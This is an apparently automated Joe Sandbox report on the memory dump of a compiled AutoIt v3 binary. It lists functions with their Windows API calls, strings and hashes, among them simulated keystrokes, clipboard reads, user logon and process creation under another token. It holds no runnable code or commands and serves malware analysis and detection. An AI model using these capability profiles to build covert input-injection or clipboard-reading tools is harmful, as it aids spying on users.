Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: _onexit
String ID:
API String ID: 572287377-0
Opcode ID: 5447c473e94d7294484c99fc93f4d38cb7bf7a8a438e953c913b8a13f1fa59d2
Instruction ID: 34bc8eb17c977a0a3d627ae860f5881c80b2bd1025997563c78a0d2e8627e8e6
Opcode Fuzzy Hash: 5447c473e94d7294484c99fc93f4d38cb7bf7a8a438e953c913b8a13f1fa59d2
Instruction Fuzzy Hash: 97C01201F6F04BC1E50A73B9EC8647841900FA7B01FD20135C10D802BADD5C52E64731

Function 00007FF7A51A10E8 Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A51C1D80: GetVersionExW.KERNEL32 ref: 00007FF7A51C1DC8
Part of subcall function 00007FF7A51C1D80: GetCurrentProcess.KERNEL32 ref: 00007FF7A51C1F42
Part of subcall function 00007FF7A51C1D80: IsWow64Process.KERNEL32 ref: 00007FF7A51C1F52

_onexit.LIBCMT ref: 00007FF7A51C4F10

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Process$CurrentVersionWow64_onexit
String ID:
API String ID: 2932345936-0
Opcode ID: 03ad02108163b1b9c24d53c6048626981572e85475d5139af19f078af1ef234b
Instruction ID: 2b3bde3a748614d4ddc7f51d37964cd599eb93d3436fabb689b3447a42a80393
Opcode Fuzzy Hash: 03ad02108163b1b9c24d53c6048626981572e85475d5139af19f078af1ef234b
Instruction Fuzzy Hash: 3EC01200FAF44BC1E60973B9E8864F442904FA7B01FD20136C50D802BADD4D51E60731

Function 00007FF7A5227E48 Relevance: 1.4, APIs: 1, Instructions: 163COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF7A5227FBE

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: b1ea28e244f60b4af54ff34aaaf102a183879d86c5d4002b95e89690f8712e5a
Instruction ID: 7c89a6c1b76e3d6f5f93e48585879ff7ab06dd16f500bae414008273e6890c6c
Opcode Fuzzy Hash: b1ea28e244f60b4af54ff34aaaf102a183879d86c5d4002b95e89690f8712e5a
Instruction Fuzzy Hash: 93717B66B0AA4285EB12FF65E4903BDA360EB86F84F860531DF0D577AACF38D545C360

Function 00007FF7A51DDDA8 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32 ref: 00007FF7A51DDDFD

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 56853fc6be513b26808fd6ceb43c2b1e56f5d2842f756231a7c5debb2bb5ead3
Instruction ID: ed49bd6737200c2fca01e6840c0af3f7f7974eb51f5a4fc39032e46d681bb444
Opcode Fuzzy Hash: 56853fc6be513b26808fd6ceb43c2b1e56f5d2842f756231a7c5debb2bb5ead3
Instruction Fuzzy Hash: D2F06286B0B60781FE667766E8103B592905F96F40FCA4831C90E863FEEE2CE4818230

Function 00007FF7A51DC51C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32 ref: 00007FF7A51DC55A

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: d6cab95e1f74feff6e8dd6f9a30a9cf55c0df8872244003ab96fdfaeeafef6ec
Instruction ID: f30008194d7efba1e1a4ad9a1eeaafeea0c8d5b9ed54db9265bffd430cd9aa22
Opcode Fuzzy Hash: d6cab95e1f74feff6e8dd6f9a30a9cf55c0df8872244003ab96fdfaeeafef6ec
Instruction Fuzzy Hash: 20F03A82B4B24745FE16B761B805278D1805F86FE4FCA4A30D82E852EAEF5CE4428630

Non-executed Functions

Function 00007FF7A52356A0 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 476filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32 ref: 00007FF7A523570B
DeleteObject.GDI32 ref: 00007FF7A5235724
DestroyWindow.USER32 ref: 00007FF7A5235738
GetDesktopWindow.USER32 ref: 00007FF7A5235758
GetWindowRect.USER32 ref: 00007FF7A5235766
SetRect.USER32 ref: 00007FF7A52358A7
AdjustWindowRectEx.USER32 ref: 00007FF7A52358BA
CreateWindowExW.USER32 ref: 00007FF7A5235929
GetClientRect.USER32 ref: 00007FF7A523593E
CreateWindowExW.USER32 ref: 00007FF7A52359A9
CreateFileW.KERNEL32 ref: 00007FF7A52359E6
GetFileSize.KERNEL32 ref: 00007FF7A52359FE
GlobalAlloc.KERNEL32 ref: 00007FF7A5235A0C
GlobalLock.KERNEL32 ref: 00007FF7A5235A18
ReadFile.KERNEL32 ref: 00007FF7A5235A33
GlobalUnlock.KERNEL32 ref: 00007FF7A5235A3E
CloseHandle.KERNEL32 ref: 00007FF7A5235A47
GlobalFree.KERNEL32 ref: 00007FF7A5235A54
CreateStreamOnHGlobal.OLE32 ref: 00007FF7A5235A68
OleLoadPicture.OLEAUT32 ref: 00007FF7A5235A87
GlobalFree.KERNEL32 ref: 00007FF7A5235A9A
CopyImage.USER32 ref: 00007FF7A5235ACB
SendMessageW.USER32 ref: 00007FF7A5235AEE
SetWindowPos.USER32 ref: 00007FF7A5235B2A
ShowWindow.USER32 ref: 00007FF7A5235DDD

Strings

DISPLAY, xrefs: 00007FF7A5235BA1
static, xrefs: 00007FF7A5235969, 00007FF7A5235B56
AutoIt v3, xrefs: 00007FF7A5235917
, xrefs: 00007FF7A5235B17

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 8e2f89096802004413711948fd726798781e069153c0ca8acc30819db0585273
Instruction ID: 2969a5a0e0cc9f68b96ee24259ec0c11a28a3ac1ad1c42a6cab8b9d58ff2df6c
Opcode Fuzzy Hash: 8e2f89096802004413711948fd726798781e069153c0ca8acc30819db0585273
Instruction Fuzzy Hash: 92229176B0AA418AE714EF25E844569B7A0FB89F94F924135DE4E43BB8CF3CD445C710

Function 00007FF7A524DB18 Relevance: 51.2, APIs: 28, Strings: 1, Instructions: 462windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32 ref: 00007FF7A524DBEA
SendMessageW.USER32 ref: 00007FF7A524DC8E
SendMessageW.USER32 ref: 00007FF7A524DCAD
SendMessageW.USER32 ref: 00007FF7A524DCE6
GetMenuItemInfoW.USER32 ref: 00007FF7A524DD10
SetMenuItemInfoW.USER32 ref: 00007FF7A524DD70
SetMenuDefaultItem.USER32 ref: 00007FF7A524DD86
GetMenuItemInfoW.USER32 ref: 00007FF7A524DD96
SetMenuDefaultItem.USER32 ref: 00007FF7A524DDB4
DrawMenuBar.USER32 ref: 00007FF7A524DDBE
SendMessageW.USER32 ref: 00007FF7A524DE57
SendMessageW.USER32 ref: 00007FF7A524DE92
GetWindowLongW.USER32 ref: 00007FF7A524DEBD
SendMessageW.USER32 ref: 00007FF7A524DEFC
SendMessageW.USER32 ref: 00007FF7A524DF3F
EnableWindow.USER32 ref: 00007FF7A524DFA7
EnableWindow.USER32 ref: 00007FF7A524DFBD
ShowWindow.USER32 ref: 00007FF7A524E03E
ShowWindow.USER32 ref: 00007FF7A524E051
EnableWindow.USER32 ref: 00007FF7A524E06B
SendMessageW.USER32 ref: 00007FF7A524E0A0
SendMessageW.USER32 ref: 00007FF7A524E0C4
GetFocus.USER32 ref: 00007FF7A524E0CA
MoveWindow.USER32 ref: 00007FF7A524E18A
SendMessageW.USER32 ref: 00007FF7A524E19F
GetWindowRect.USER32 ref: 00007FF7A524E1BE
MoveWindow.USER32 ref: 00007FF7A524E1F1
MoveWindow.USER32 ref: 00007FF7A524E21F

Strings

P, xrefs: 00007FF7A524DCFD

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Window$MessageSend$Menu$Item$EnableInfoMove$DefaultShow$DrawFocusLongRect
String ID: P
API String ID: 1208186926-3110715001
Opcode ID: 0e3e078a853430a05022e0f772db04c3cd8d70c986a797c2cebe1c7d1304ed73
Instruction ID: 8e57eb32f038d86d0d4e2c14eb12b1b91b88a3f828e85667a9f658bb9e8f5cc4
Opcode Fuzzy Hash: 0e3e078a853430a05022e0f772db04c3cd8d70c986a797c2cebe1c7d1304ed73
Instruction Fuzzy Hash: 071227B2B1A64286F7249B25D8547BDA7B0FB86F84F924535DA0D07AE8CF3DE440CB10

Function 00007FF7A52332AC Relevance: 47.6, APIs: 22, Strings: 5, Instructions: 327windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 00007FF7A52351B9
SystemParametersInfoW.USER32 ref: 00007FF7A5235312
SetRect.USER32 ref: 00007FF7A5235358
AdjustWindowRectEx.USER32 ref: 00007FF7A523536B
CreateWindowExW.USER32 ref: 00007FF7A52353D6
GetClientRect.USER32 ref: 00007FF7A52353EB
CreateWindowExW.USER32 ref: 00007FF7A523546A
CreateDCW.GDI32 ref: 00007FF7A5235486
GetStockObject.GDI32 ref: 00007FF7A5235496
SelectObject.GDI32 ref: 00007FF7A52354A2
GetTextFaceW.GDI32 ref: 00007FF7A52354B3
GetDeviceCaps.GDI32 ref: 00007FF7A52354C0
DeleteDC.GDI32 ref: 00007FF7A52354CB
CreateFontW.GDI32 ref: 00007FF7A5235530
SendMessageW.USER32 ref: 00007FF7A5235546
CreateWindowExW.USER32 ref: 00007FF7A52355A8
SendMessageW.USER32 ref: 00007FF7A52355C6
SendMessageW.USER32 ref: 00007FF7A52355DE
CreateWindowExW.USER32 ref: 00007FF7A523563B
GetStockObject.GDI32 ref: 00007FF7A523564B
SendMessageW.USER32 ref: 00007FF7A5235661
ShowWindow.USER32 ref: 00007FF7A5235671

Strings

DISPLAY, xrefs: 00007FF7A5235473
A, xrefs: 00007FF7A5235629
static, xrefs: 00007FF7A5235463, 00007FF7A5235622
AutoIt v3, xrefs: 00007FF7A52353C5
msctls_progress32, xrefs: 00007FF7A523558C

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: A$AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-2439800395
Opcode ID: 6a4158767fd1e3aa62d6cad0ab6a36848a32ab8b88e438b2c1d2663541e17033
Instruction ID: 68cc6a7d2ee807d82321ac17a3722d685903f470f832362d5387a91bf272b25f
Opcode Fuzzy Hash: 6a4158767fd1e3aa62d6cad0ab6a36848a32ab8b88e438b2c1d2663541e17033
Instruction Fuzzy Hash: 5CE1A2B660978186E714EF65E84466AB7A0FB89B94F910135EF4E43BB8CF7CE444CB10

Function 00007FF7A51C4514 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 122threadkeyboardwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00007FF7A51C452F
FindWindowW.USER32 ref: 00007FF7A520A812
IsIconic.USER32 ref: 00007FF7A520A81E
ShowWindow.USER32 ref: 00007FF7A520A830
SetForegroundWindow.USER32 ref: 00007FF7A520A839
GetWindowThreadProcessId.USER32 ref: 00007FF7A520A84C
GetCurrentThreadId.KERNEL32 ref: 00007FF7A520A854
GetWindowThreadProcessId.USER32 ref: 00007FF7A520A862
AttachThreadInput.USER32 ref: 00007FF7A520A878
AttachThreadInput.USER32 ref: 00007FF7A520A886
AttachThreadInput.USER32 ref: 00007FF7A520A894
SetForegroundWindow.USER32 ref: 00007FF7A520A89D
MapVirtualKeyW.USER32 ref: 00007FF7A520A8B2
keybd_event.USER32 ref: 00007FF7A520A8C3
MapVirtualKeyW.USER32 ref: 00007FF7A520A8CD
keybd_event.USER32 ref: 00007FF7A520A8DF
MapVirtualKeyW.USER32 ref: 00007FF7A520A8E9
keybd_event.USER32 ref: 00007FF7A520A8FA
MapVirtualKeyW.USER32 ref: 00007FF7A520A904
keybd_event.USER32 ref: 00007FF7A520A916
SetForegroundWindow.USER32 ref: 00007FF7A520A91F
AttachThreadInput.USER32 ref: 00007FF7A520A93C
AttachThreadInput.USER32 ref: 00007FF7A520A94A
AttachThreadInput.USER32 ref: 00007FF7A520A958

Strings

Shell_TrayWnd, xrefs: 00007FF7A520A80B

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 3778422247-2988720461
Opcode ID: cd6974c24a3c73bdd9695786a971f02835d0cd3b561fa91e9f0f548f8bdf6fbe
Instruction ID: 7dd917f6d345807887318822b11fb0cb5b5becfbadc451623e9ed0493f402b34
Opcode Fuzzy Hash: cd6974c24a3c73bdd9695786a971f02835d0cd3b561fa91e9f0f548f8bdf6fbe
Instruction Fuzzy Hash: E7418C61F0A51283F714AB25AC5873DA391BF9AF81FD64035C90A47BBCDF3EA8468750

Function 00007FF7A51A183C Relevance: 38.0, APIs: 25, Instructions: 475windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 00007FF7A51A18EA
DeleteObject.GDI32 ref: 00007FF7A51A194E
DeleteObject.GDI32 ref: 00007FF7A51A1956
DestroyIcon.USER32 ref: 00007FF7A51A195E
DestroyWindow.USER32 ref: 00007FF7A51A1966
ImageList_Destroy.COMCTL32 ref: 00007FF7A51E9C2A
MoveWindow.USER32 ref: 00007FF7A51EA15B
SendMessageW.USER32 ref: 00007FF7A51EA18F
SendMessageW.USER32 ref: 00007FF7A51EA1AD
ImageList_Destroy.COMCTL32 ref: 00007FF7A51EA1C2
ImageList_Destroy.COMCTL32 ref: 00007FF7A51EA1D1

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Destroy$ImageList_Window$DeleteMessageObjectSend$IconMove
String ID:
API String ID: 3372153169-0
Opcode ID: cebe50662675a261df0ce57bb688d6874ca0698041b92cdd573b2dd792630721
Instruction ID: f5a3614f6bfe45f44714d5231779b9722bda9b2563e6c334c3b7b9fcd6318a6a
Opcode Fuzzy Hash: cebe50662675a261df0ce57bb688d6874ca0698041b92cdd573b2dd792630721
Instruction Fuzzy Hash: 9F22B7A6A0A542C2EB66AB15E4542BDA761FF82F94F964131DE1E077F8DF3DE440C320

Function 00007FF7A520CE68 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 227processCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A520D5CC: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF7A520D630
Part of subcall function 00007FF7A520D5CC: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF7A520D66F
Part of subcall function 00007FF7A520D5CC: GetLastError.KERNEL32 ref: 00007FF7A520D682

LogonUserW.ADVAPI32 ref: 00007FF7A520CF1A
DuplicateTokenEx.ADVAPI32 ref: 00007FF7A520CF4D
CloseHandle.KERNEL32 ref: 00007FF7A520CF60
OpenWindowStationW.USER32 ref: 00007FF7A520CF7F
GetProcessWindowStation.USER32 ref: 00007FF7A520CF96
SetProcessWindowStation.USER32 ref: 00007FF7A520CFA3
OpenDesktopW.USER32 ref: 00007FF7A520CFC3
wcscpy.LIBCMT ref: 00007FF7A520D0A5
LoadUserProfileW.USERENV ref: 00007FF7A520D0B8
CreateEnvironmentBlock.USERENV ref: 00007FF7A520D0D8
CreateProcessAsUserW.ADVAPI32 ref: 00007FF7A520D12F

Part of subcall function 00007FF7A520D780: GetProcessHeap.KERNEL32 ref: 00007FF7A520D7A2
Part of subcall function 00007FF7A520D780: HeapAlloc.KERNEL32 ref: 00007FF7A520D7B4
Part of subcall function 00007FF7A520D780: GetCurrentProcess.KERNEL32 ref: 00007FF7A520D7BD
Part of subcall function 00007FF7A520D780: GetCurrentProcess.KERNEL32 ref: 00007FF7A520D7C6
Part of subcall function 00007FF7A520D780: DuplicateHandle.KERNEL32 ref: 00007FF7A520D7EA
Part of subcall function 00007FF7A520D780: GetCurrentProcess.KERNEL32 ref: 00007FF7A520D7F0
Part of subcall function 00007FF7A520D780: GetCurrentProcess.KERNEL32 ref: 00007FF7A520D7F9
Part of subcall function 00007FF7A520D780: DuplicateHandle.KERNEL32 ref: 00007FF7A520D81E
Part of subcall function 00007FF7A520D780: CreateThread.KERNEL32 ref: 00007FF7A520D844

UnloadUserProfile.USERENV ref: 00007FF7A520D16C
CloseWindowStation.USER32 ref: 00007FF7A520D185
CloseDesktop.USER32 ref: 00007FF7A520D193
SetProcessWindowStation.USER32 ref: 00007FF7A520D1A5
CloseHandle.KERNEL32 ref: 00007FF7A520D1B0
DestroyEnvironmentBlock.USERENV ref: 00007FF7A520D1C7

Strings

winsta0, xrefs: 00007FF7A520CF72
winsta0\default, xrefs: 00007FF7A520D054
default, xrefs: 00007FF7A520CFB7

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Process$StationWindow$CloseCurrentHandleUser$CreateDuplicate$BlockDesktopEnvironmentHeapOpenProfileToken$AdjustAllocDestroyErrorLastLoadLogonLookupPrivilegePrivilegesThreadUnloadValuewcscpy
String ID: default$winsta0$winsta0\default
API String ID: 3202303201-1423368268
Opcode ID: de7527ded46d2e32930649954c580003a2a01d55c070abe543a614e541a7caf5
Instruction ID: e59aeb75701b10560ef75b60f9ca4400987d83f5e8c6effefcfdeb5a6e3fa3ae
Opcode Fuzzy Hash: de7527ded46d2e32930649954c580003a2a01d55c070abe543a614e541a7caf5
Instruction Fuzzy Hash: D6A14DB2B0AB4186E710EF61E8402AAA3A1FB86B94F850135DE5D47BEDDF3DE405C750

Function 00007FF7A51A2AE0 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32 ref: 00007FF7A51A2BE8
GetSystemMetrics.USER32 ref: 00007FF7A51A2BF3
SystemParametersInfoW.USER32 ref: 00007FF7A51A2C25
GetSystemMetrics.USER32 ref: 00007FF7A51A2C2F
GetSystemMetrics.USER32 ref: 00007FF7A51A2C5A
SetRect.USER32 ref: 00007FF7A51A2C7D
AdjustWindowRectEx.USER32 ref: 00007FF7A51A2C90
CreateWindowExW.USER32 ref: 00007FF7A51A2CEF
SetWindowLongPtrW.USER32 ref: 00007FF7A51A2D0E
GetClientRect.USER32 ref: 00007FF7A51A2D30
GetStockObject.GDI32 ref: 00007FF7A51A2D4C
SendMessageW.USER32 ref: 00007FF7A51A2D5F

Part of subcall function 00007FF7A51A1CEC: GetCursorPos.USER32 ref: 00007FF7A51A1D1B
Part of subcall function 00007FF7A51A1CEC: ScreenToClient.USER32 ref: 00007FF7A51A1D3A
Part of subcall function 00007FF7A51A1CEC: GetAsyncKeyState.USER32 ref: 00007FF7A51A1D62
Part of subcall function 00007FF7A51A1CEC: GetAsyncKeyState.USER32 ref: 00007FF7A51A1D82

SetTimer.USER32 ref: 00007FF7A51A2D90

Strings

AutoIt v3 GUI, xrefs: 00007FF7A51A2CDF

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: b8f5b06e3d0277f3ffc73035af6cc9ad4e685f54e981a48a8f38e285d267cba3
Instruction ID: 13f4e669f3fef5ab954df1e12eeaa0d87b1f610777d1eb4a61835ba42421c8d3
Opcode Fuzzy Hash: b8f5b06e3d0277f3ffc73035af6cc9ad4e685f54e981a48a8f38e285d267cba3
Instruction Fuzzy Hash: 87D19D76A06646CAE715EF78E8542B877A1FB85B48F920135DA0E437A8CF3CE444C760

Function 00007FF7A5230A6C Relevance: 30.2, APIs: 20, Instructions: 169clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00007FF7A5230AAA
IsClipboardFormatAvailable.USER32 ref: 00007FF7A5230AB7
GetClipboardData.USER32 ref: 00007FF7A5230AC9
CloseClipboard.USER32 ref: 00007FF7A5230AD7
GlobalLock.KERNEL32 ref: 00007FF7A5230B07
CloseClipboard.USER32 ref: 00007FF7A5230B12
GlobalUnlock.KERNEL32 ref: 00007FF7A5230B42
IsClipboardFormatAvailable.USER32 ref: 00007FF7A5230B52
